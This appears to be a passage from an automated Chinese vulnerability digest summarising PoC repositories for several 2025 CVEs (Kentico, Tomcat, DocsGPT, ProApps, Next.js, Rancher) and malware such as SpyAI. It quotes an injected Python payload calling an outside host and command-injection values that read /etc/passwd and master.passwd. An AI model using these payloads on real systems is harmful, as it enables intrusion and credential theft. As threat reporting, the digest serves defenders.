该仓库提供了Kentico Xperience 13的认证绕过漏洞(CVE-2025-0011)的PoC和相关信息。 仓库包含了README.md文件,详细描述了漏洞的细节、影响版本、利用步骤和缓解措施。 最新提交修改了README.md, 增加了PoC代码,并完善了说明,可以用于创建管理员账户。 漏洞是由于通过构造恶意的HTTP请求,操纵session验证逻辑来实现的认证绕过,可以获取管理员权限。 漏洞影响版本为 Kentico Xperience 13.0.0 - 13.0.45。利用方式是构造恶意的POST请求绕过身份验证,创建管理员账户,进而控制整个CMS系统。 提供了使用curl的PoC示例,以及验证访问的Python脚本。 提交还提供了缓解措施,包括打补丁和添加WAF规则以阻止恶意请求。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 认证绕过导致管理员权限提升 |
|
|||
|
|
| 2 | 影响Kentico Xperience 13多个版本 |
|
|||
|
|
| 3 | 提供可用的PoC |
|
|||
|
|
| 4 | 利用方式清晰,有明确的步骤 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:通过构造恶意的HTTP请求,绕过身份验证机制。
|
|||
|
|
|
|||
|
|
> 利用方法:构造HTTP POST请求,修改Cookie和__RequestVerificationToken,创建管理员账号,然后访问admin页面,验证绕过成功。
|
|||
|
|
|
|||
|
|
> 修复方案:应用Kentico补丁;添加WAF规则,阻止恶意请求;启用MFA;审计会话管理逻辑。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Kentico Xperience 13
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的CMS系统,且提供了完整的PoC,可以实现远程代码执行,具有极高的安全风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-24813 - Tomcat session 反序列化漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-24813 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 19:56:31 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [Tomcat-CVE-2025-24813](https://github.com/B1gN0Se/Tomcat-CVE-2025-24813)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了针对Tomcat session反序列化漏洞(CVE-2025-24813)的PoC和利用代码。仓库整体上较为简单,主要功能是构造恶意的序列化payload并发送到目标Tomcat服务器。
|
|||
|
|
|
|||
|
|
最近的更新主要集中在删除exp目录及其下的文件,包括用于批量扫描的Python脚本(CVE_2025_24813.py)、payload文件(payload.ser)和URL列表文件(url.txt, vulnerable_urls.txt)。同时添加了`poc.py`文件以及修改了README.md。`poc.py` 文件包含了一个用于发送序列化payload的Python脚本。README.md文档增加了使用java-chains生成payload的说明,并提供了使用curl命令进行漏洞利用的示例。更新还包括了漏洞利用的截图。
|
|||
|
|
|
|||
|
|
漏洞利用方式:
|
|||
|
|
1. 构造恶意的序列化payload。java-chains工具可以帮助生成恶意的payload。
|
|||
|
|
2. 使用`poc.py`脚本或者手动使用curl命令发送PUT请求,将payload发送到`pocss.session`端点。
|
|||
|
|
3. 发送GET请求,触发反序列化漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Tomcat session 反序列化漏洞。 |
|
|||
|
|
| 2 | 提供了Java-chains用于生成payload。 |
|
|||
|
|
| 3 | 提供了POC, 包含 Python 脚本和 curl 命令。 |
|
|||
|
|
| 4 | 漏洞利用方式明确。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Tomcat处理session数据时,未对用户提供的输入进行严格的过滤和验证,导致可以注入恶意payload,进而导致远程代码执行(RCE)。
|
|||
|
|
|
|||
|
|
> 利用方法:构造恶意的序列化payload,通过PUT请求发送到`pocss.session`,然后通过GET请求触发反序列化漏洞。
|
|||
|
|
|
|||
|
|
> 修复方案:升级Tomcat版本到安全版本,或者对session数据进行严格的过滤和验证。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Apache Tomcat
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该CVE漏洞描述明确,提供了POC和详细的利用方法,可直接用于漏洞验证和复现,且影响Apache Tomcat这种广泛使用的组件。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0868 - Docsgpt 远程代码执行漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-0868 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 22:00:10 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [PoC_CVE-2025-0868](https://github.com/shreyas-malhotra/PoC_CVE-2025-0868)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该CVE描述了一个针对 Docsgpt 系统的远程代码执行漏洞。相关仓库提供了一个PoC。 仓库最初只包含一个README文件。随后,添加了一个poc.sh脚本文件,该脚本通过curl命令向docsgpt.local:7091/api/remote接口发送一个POST请求,尝试利用漏洞。该请求构造了恶意payload,注入了Python代码(`__import__('requests').get('http://172.17.0.1:1234/')`),旨在实现远程代码执行。该PoC虽然简短,但展示了漏洞的可利用性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 存在远程代码执行漏洞 |
|
|||
|
|
| 2 | 提供了可用的PoC |
|
|||
|
|
| 3 | 利用curl命令进行payload注入 |
|
|||
|
|
| 4 | 漏洞影响docsgpt系统 |
|
|||
|
|
| 5 | PoC利用python的requests库实现RCE |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:通过构造恶意请求,注入Python代码,最终实现远程代码执行。
|
|||
|
|
|
|||
|
|
> 利用方法:使用curl命令向docsgpt系统的/api/remote接口发送POST请求,payload中包含恶意代码。
|
|||
|
|
|
|||
|
|
> 修复方案:修复/api/remote接口的参数处理,过滤或转义用户输入,防止代码注入。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• docsgpt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞为远程代码执行漏洞(RCE),且提供了可用的PoC。PoC能够直接执行任意代码,危害严重。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-25705 - ProApps RCE via ping命令注入
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-25705 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 21:55:19 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-25705](https://github.com/Cotherm/CVE-2025-25705)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库包含了针对ProApps Enterprise Appliance的远程代码执行(RCE)漏洞的描述和利用信息。仓库主要包含一个README.md文件,详细描述了漏洞的成因、利用方法以及POC。
|
|||
|
|
|
|||
|
|
漏洞分析:
|
|||
|
|
* 漏洞类型: RCE。
|
|||
|
|
* 漏洞描述:由于应用程序在处理ping功能时,未对用户输入进行充分的过滤,允许攻击者通过注入系统命令来实现RCE。攻击者可以通过在host参数中插入命令序列操作符来执行任意命令。
|
|||
|
|
* 利用方法:通过构造恶意的POST请求,在host参数中注入命令,例如`host=8.8.8.8; cat /etc/passwd`。可以通过网络代理绕过前端的输入校验。
|
|||
|
|
* POC: 提供了一个reverse shell的POC,通过curl下载恶意脚本并执行,从而获取shell。
|
|||
|
|
* 影响:RCE漏洞,可能导致完全系统控制、数据泄露等。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | ProApps Enterprise Appliance 存在RCE漏洞 |
|
|||
|
|
| 2 | 漏洞利用需要通过身份验证,但绕过输入过滤 |
|
|||
|
|
| 3 | 提供Reverse Shell POC |
|
|||
|
|
| 4 | 影响包括完全系统控制,数据泄露等 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理: 应用未对ping命令的host参数进行严格过滤,允许命令注入
|
|||
|
|
|
|||
|
|
> 利用方法: 通过POST请求,在host参数中注入恶意命令
|
|||
|
|
|
|||
|
|
> 修复方案: 修复输入验证, 过滤特殊字符, 避免直接执行用户输入
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• ProApps Enterprise Appliance
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞为RCE,具有明确的利用方法和POC,可以直接用于攻击,且影响范围明确。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-25706 - ProApps ping命令注入RCE
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-25706 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 21:54:45 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-25706](https://github.com/Cotherm/CVE-2025-25706)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库的README.md文档详细描述了FreeBDS Unix上ProApps Enterprise Appliance的ping命令注入漏洞(CVE-2025-25706)。仓库功能主要说明了ProApps Enterprise Appliance的ping诊断功能,用户可以通过该功能ping任意主机。最新提交更新了README.md文件,详细描述了RCE漏洞的原理、利用方法和POC。漏洞产生原因是由于程序没有对用户输入进行充分的过滤,导致攻击者可以通过构造恶意的host参数注入系统命令,实现远程代码执行。给出了完整的利用流程,包括了如何通过构造POST请求绕过前端验证,以及利用curl和bash进行反弹shell的POC。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | ProApps Enterprise Appliance 存在ping命令注入漏洞。 |
|
|||
|
|
| 2 | 攻击者通过构造恶意host参数绕过前端验证。 |
|
|||
|
|
| 3 | 漏洞利用需要认证,但可实现远程代码执行。 |
|
|||
|
|
| 4 | 提供了RCE的POC,包括反弹shell的利用方法。 |
|
|||
|
|
| 5 | 影响范围明确,可能导致服务器完全控制。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理: 应用程序使用ping功能时,未充分过滤用户输入的host参数,允许通过(;, &&, or |)等命令分隔符注入系统命令。
|
|||
|
|
|
|||
|
|
> 利用方法: 构造POST请求,在host参数中注入恶意命令,例如: `page=sta_rede.diagnostico_ping&host=8.8.8.8; cat /etc/passwd;cat /etc/master.passwd&testar_pacote=1&ttl=64`。
|
|||
|
|
|
|||
|
|
> 修复方案: 对用户输入的host参数进行严格的过滤和验证,确保只允许合法的输入,禁止执行任何系统命令,使用安全函数,或者对输入进行转义。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• ProApps - Enterprise Appliance
|
|||
|
|
• FreeBSD Unix
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该CVE描述了远程代码执行漏洞(RCE),具有明确的利用方法,包括绕过前端验证的细节,并提供了反弹shell的POC。影响关键基础设施,具备完整的利用代码,价值极高。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-29927 - Next.js授权绕过漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-29927 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 01:40:29 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-29927](https://github.com/a9v8i/CVE-2025-29927)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供Next.js授权绕过漏洞的扫描工具和相关信息。 仓库更新频繁,readme更新了漏洞描述,包括受影响版本和修复版本,还提供了nvs.sh脚本,用于安装漏洞扫描器。nvs.sh脚本用于下载和安装next.js-vulnerability-scanner。最新的更新主要是重命名njs.sh为nvs.sh,并且更新了相关依赖的安装流程。漏洞信息显示,该漏洞存在于多个Next.js版本中,攻击者可以通过绕过授权机制进行未授权访问。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Next.js授权绕过漏洞 |
|
|||
|
|
| 2 | 影响版本:> 11.1.4 < 12.3.5, > 14.0 < 14.2.25, > 15.0 < 15.2.3, >= 13.0.0, < 13.5.9 |
|
|||
|
|
| 3 | 提供了漏洞扫描工具,可能包含POC或利用代码 |
|
|||
|
|
| 4 | 重命名脚本,修复部分bug |
|
|||
|
|
| 5 | 修复版本:12.3.5, 14.2.25, 15.2.3 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:绕过Next.js的授权机制,导致未授权访问。具体绕过细节未明确说明,需进一步分析nvs.sh脚本。
|
|||
|
|
|
|||
|
|
> 利用方法:通过扫描器扫描目标Next.js应用,判断是否存在授权绕过漏洞。nvs.sh脚本可能包含扫描逻辑或POC。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到修复版本12.3.5, 14.2.25, 15.2.3
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Next.js
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
影响广泛使用的框架Next.js,且存在明确的受影响版本和修复版本,提供了漏洞扫描工具,具有一定的利用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### TOP - 漏洞POC和EXP收集
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [TOP](https://github.com/GhostTroops/TOP) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个漏洞POC和EXP的集合,主要关注渗透测试相关的CVE漏洞。更新内容是使用GitHub Action自动更新README.md文件中的POC列表,增加了新的漏洞POC,例如IngressNightmare-PoC等,旨在收录和分享最新的漏洞利用代码。 此次更新增加了POC代码来利用IngressNightmare漏洞(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974)。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 收录了多个CVE漏洞的POC和EXP |
|
|||
|
|
| 2 | 持续更新以反映最新的漏洞信息 |
|
|||
|
|
| 3 | 包含IngressNightmare漏洞的POC |
|
|||
|
|
| 4 | 更新由GitHub Action自动化 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 仓库维护者收集了多种CVE漏洞的POC和EXP。
|
|||
|
|
|
|||
|
|
> README.md文件包含了漏洞名称、链接和简要描述。
|
|||
|
|
|
|||
|
|
> 更新包括IngressNightmare的POC,这些POC可以用于测试和利用多个漏洞。
|
|||
|
|
|
|||
|
|
> 利用IngressNightmare-PoC进行漏洞利用,需要针对特定的漏洞进行payload构造和参数配置。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 多个软件和系统,取决于所列出的CVE漏洞
|
|||
|
|
• IngressNightmare漏洞受影响的系统
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了多个漏洞的POC和EXP,包括IngressNightmare的POC,对于安全研究和渗透测试具有重要价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### cloud-native-sec-vuln - 云原生安全漏洞分析
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [cloud-native-sec-vuln](https://github.com/miao2sec/cloud-native-sec-vuln) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库主要关注云原生环境下的安全漏洞。最近的更新集中在Rancher平台的一个漏洞(CVE-2025-23391),该漏洞允许受限管理员更改管理员密码。更新内容包括漏洞描述、影响分析、修复方案和参考资料。该漏洞允许具有"Restricted Administrator"权限的用户更改管理员密码,从而导致账户接管。该漏洞影响使用受限管理员角色的Rancher部署。
|
|||
|
|
|
|||
|
|
漏洞利用方式:攻击者利用受限管理员权限,通过更改管理员密码来接管管理员账户。
|
|||
|
|
|
|||
|
|
更新内容分析:
|
|||
|
|
1. 增加了漏洞的详细描述。
|
|||
|
|
2. 提供了漏洞的影响分析,指出了受影响的Rancher部署。
|
|||
|
|
3. 阐述了修补方案,以及相关的修复。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Rancher平台安全漏洞(CVE-2025-23391) |
|
|||
|
|
| 2 | 受限管理员可更改管理员密码 |
|
|||
|
|
| 3 | 账户接管风险 |
|
|||
|
|
| 4 | 漏洞影响分析和修复方案 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞类型:权限提升。
|
|||
|
|
|
|||
|
|
> 漏洞描述:Restricted Administrator可以修改管理员密码。
|
|||
|
|
|
|||
|
|
> 技术细节:漏洞影响Rancher部署,其中Restricted Administrator角色被使用,修复方案涉及添加manage-users verb。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Rancher
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该更新披露了一个高危漏洞,该漏洞允许攻击者通过权限提升的方式接管管理员账户,修复方案已提供。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### SpyAI - 基于Slack C2的智能恶意软件
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [SpyAI](https://github.com/freakick22/SpyAI) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
SpyAI是一个智能恶意软件,它通过捕获整个监视器的屏幕截图,并通过受信任的Slack通道将其导出到C2服务器,该服务器使用GPT-4 Vision来分析它们并构建每日活动。本次更新主要修改了README.md文件,增加了对工具的描述以及配置说明。该工具利用了Slack作为C2通道,以及GPT-4 Vision进行分析,增加了隐蔽性和智能化程度。由于该恶意软件具有屏幕截图捕获和数据外泄的功能,并且通过Slack与C2服务器通信,因此存在较高的安全风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 恶意软件使用Slack作为C2通道进行通信。 |
|
|||
|
|
| 2 | 利用GPT-4 Vision分析屏幕截图,构建活动分析。 |
|
|||
|
|
| 3 | 捕获整个监视器的屏幕截图并外泄。 |
|
|||
|
|
| 4 | 更新了README.md文件,增加了配置说明 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 该恶意软件由C++和Python组成,C++用于屏幕截图捕获和数据上传,Python用于C2服务器端的功能,如GPT-4 Vision的分析。
|
|||
|
|
|
|||
|
|
> Slack Token, Slack Channel ID, OpenAI API Key等敏感信息需要配置在代码中,存在泄露风险
|
|||
|
|
|
|||
|
|
> 利用Slack作为C2通道,增加了隐蔽性,难以被传统的安全检测工具发现。
|
|||
|
|
|
|||
|
|
> GPT-4 Vision分析功能用于理解受害者活动,提高攻击效率。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 受害者系统
|
|||
|
|
• Slack
|
|||
|
|
• OpenAI API
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目是一个具有实际功能的恶意软件,包含C2框架,利用了新型技术,例如GPT-4 Vision。虽然本次更新仅更新了README.md,但其核心功能和潜在威胁是明确的,值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### smart-home-aws - AI驱动的智能家居安全系统
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [smart-home-aws](https://github.com/fipazao/smart-home-aws) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `功能更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个基于AWS和NVIDIA CUDA的智能家居自动化系统。它集成了Arduino、AWS IoT和NVIDIA CUDA,实现了远程控制、传感器监控和AI驱动的安全功能,如运动检测和面部识别。更新内容主要为README文件的修改,包括了对系统关键特性的描述和快速入门指南的完善。虽然没有直接涉及漏洞利用,但其中AI安全相关的部分,如运动检测和面部识别,暗示了潜在的安全风险,比如AI模型被攻击的风险,例如对抗样本攻击。因此需要关注AI安全相关的技术细节。仓库的功能符合关键词要求,但是没有漏洞利用代码或POC,也没有实现独特的安全检测或防护功能,代码质量无法评估。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 远程设备控制 |
|
|||
|
|
| 2 | AI增强安全特性(运动检测和面部识别) |
|
|||
|
|
| 3 | 实时仪表盘 |
|
|||
|
|
| 4 | 数据记录与分析 |
|
|||
|
|
| 5 | 与搜索关键词'AI+Security'高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Arduino代码用于设备控制和传感器数据采集
|
|||
|
|
|
|||
|
|
> AWS Lambda 函数用于后端处理和控制
|
|||
|
|
|
|||
|
|
> Web仪表盘用于数据可视化
|
|||
|
|
|
|||
|
|
> NVIDIA CUDA 用于AI安全功能(运动检测和面部识别)
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Arduino Uno
|
|||
|
|
• AWS IoT Core
|
|||
|
|
• AWS Lambda
|
|||
|
|
• AWS S3
|
|||
|
|
• DynamoDB
|
|||
|
|
• Flask (web dashboard)
|
|||
|
|
• NVIDIA CUDA
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
仓库实现了AI增强的安全功能,与关键词'AI+Security'高度相关。虽然当前版本没有提供漏洞利用代码或POC,但AI相关的特性(如运动检测和面部识别)具有安全研究价值,可以探索其潜在的攻击面和防御手段。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AI_MAL - AI驱动的渗透测试平台
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AI_MAL](https://github.com/Dleifnesor/AI_MAL) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全修复` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个结合了AI与网络扫描、渗透测试工具的平台,用于自动化安全侦察和漏洞利用。主要功能包括端口扫描、漏洞扫描、密码爆破、WEB扫描等。最近的更新主要集中在install.sh脚本的修复和增强,包括修复python代码中的语法错误,配置Ollama以接受外部连接等。其中,对adaptive_nmap_scan.py文件中try-except代码块结构的修复以及对Ollama的配置,提高了平台的稳定性和可用性。修复代码错误和配置优化表明了维护者正在积极维护并改进该平台,使其更稳定、更易于使用。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | AI_MAL是一个自动化安全侦察和渗透测试平台 |
|
|||
|
|
| 2 | 更新修复了install.sh脚本的语法错误和代码问题 |
|
|||
|
|
